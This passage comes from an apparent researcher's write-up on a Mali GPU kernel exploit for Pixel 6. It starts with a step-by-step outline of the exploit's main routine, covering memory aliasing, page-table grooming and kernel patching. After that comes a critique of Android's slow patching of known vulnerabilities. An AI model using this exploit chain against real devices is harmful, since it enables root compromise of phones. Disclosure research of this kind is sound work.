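    make_evictable(mali_fd, jit_gpu_va);                     /* step 2: KBASE_IOCTL_MEM_FLAGS_CHANGE with BASE_MEM_DONT_NEED */
    apply_pressure_until_freed(mali_fd, jit_gpu_va);         /* steps 3-4: mmap pressure, probe with KBASE_IOCTL_MEM_QUERY */
    alloc_and_alias(mali_fd, nr_pages,
                    &alloc_gpu_va, &alias_gpu_va);           /* steps 5-6: KBASE_IOCTL_MEM_ALLOC + KBASE_IOCTL_MEM_ALIAS */
    submit_jit_free(mali_fd);                                /* step 7: BASE_JD_REQ_SOFT_JIT_FREE shrinks the replacement region */
    reuse_freed_pages_as_pgd(mali_fd);                       /* step 8: groom the memory pools so a freed page becomes a PGD */
    map_and_patch_kernel(mali_fd, alias_gpu_va);             /* step 9: rewrite the PGD via the alias, map and patch kernel code */
    return 0;
}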

The exploit for Pixel 6 can be found here with some setup notes.

Disclosure and patch gapping

At the start of the post, I mentioned that I initially reported this bug to the Android Security team, but it was later dismissed as a “Won’t fix” bug. While it is unclear to me why such a decision was made, it is perhaps worth taking a look at the wider picture instead of treating this as an isolated incident.

There has been a long history of N-day vulnerabilities being exploited in the Android kernel, many of which were fixed in the upstream kernel but didn't get ported to Android. Perhaps the most infamous of these was CVE-2019-2215 (Bad Binder), which was initially found by the syzkaller fuzzer in November 2017 and patched in February 2018. However, this fix was never included in an Android monthly security bulletin until it was rediscovered as an exploited in-the-wild bug in September 2019. Another exploited in-the-wild bug, CVE-2021-1048, was introduced in the upstream kernel in December 2020 and was fixed upstream a few weeks later. The patch, however, was not included in the Android Security Bulletin until November 2021, when it was discovered to be exploited in-the-wild. Yet another exploited in-the-wild vulnerability, CVE-2021-0920, was found in 2016, with details visible in a Linux kernel email thread. The report, however, was dismissed by kernel developers at the time, until it was rediscovered to be exploited in-the-wild and patched in November 2021.

To be fair, these cases were patched or ignored upstream without being identified as security issues (for example, CVE-2021-0920 was ignored), making it difficult for any vendor to identify such issues before it is too late.

This again shows the importance of properly addressing security issues and recording them by assigning a CVE ID, so that downstream users can apply the relevant security patches. Unfortunately, vendors often see having security vulnerabilities in their products as damage to their reputation and try to silently patch or downplay security issues instead. The above examples show just how serious the consequences of such a mentality can be.

While Android has made improvements to keep the kernel branches more unified and up-to-date to avoid problems like CVE-2019-2215, where the vulnerability was patched in some branches but not others, some recent disclosures highlight a rather worrying trend.

On March 7th, 2022, CVE-2022-0847 (Dirty Pipe) was disclosed publicly, with full details and a proof-of-concept exploit to overwrite read-only files. While the bug was patched upstream on February 23rd, 2022, with the patch merged into the Android kernel on February 24th, 2022, the patch was not included in the Android Security Bulletin until May 2022, and the public proof-of-concept exploit still ran successfully on a Pixel 6 with the April patch. While this may look like another incident where a security bug was patched silently upstream, this case was very different. According to the disclosure timeline, the bug report was shared with the Android Security Team on February 21st, 2022, a day after it was reported to the Linux kernel.

Another vulnerability, CVE-2021-39793 in the Mali driver, was patched by Arm in version r36p0 of the driver (as CVE-2022-22706), which was released on February 11th, 2022. The patch was only included in the Android Security Bulletin in March as an exploited in-the-wild bug.

Yet another vulnerability, CVE-2022-20186, which I reported to the Android Security Team on January 15th, 2022, was patched by Arm in version r37p0 of the Mali driver, which was released on April 21st, 2022. The patch was only included in the Android Security Bulletin in June, and a Pixel 6 running the May patch was still affected.

Looking at security issues reported by Google's Project Zero team, between June and July 2022, Jann Horn of Project Zero reported five security issues (2325, 2327, 2331, 2333, 2334) in the Arm Mali GPU that affected the Pixel phones. These issues were promptly fixed as CVE-2022-33917 and CVE-2022-36449 by the Arm security team on July 25th, 2022 (CVE-2022-33917 in r39p0) and on August 18th, 2022 (CVE-2022-36449 in r38p1). The details of these bugs, together with proofs of concept, were disclosed on September 18th, 2022. However, at least some of the issues remained unfixed in December 2022 (for example, issue 2327 was only fixed silently in the January 2023 patch, without mentioning the CVE ID), even after Project Zero published a blog post highlighting the patching problem with these particular issues on November 22nd, 2022.

In all of these cases, the bugs were only patched in Android a couple of months after a patch was publicly released upstream. In light of this, the response to this current bug is perhaps not too surprising.

The year is 2023 A.D., and Android can still be pwned with N-days entirely. Well, yes, entirely.
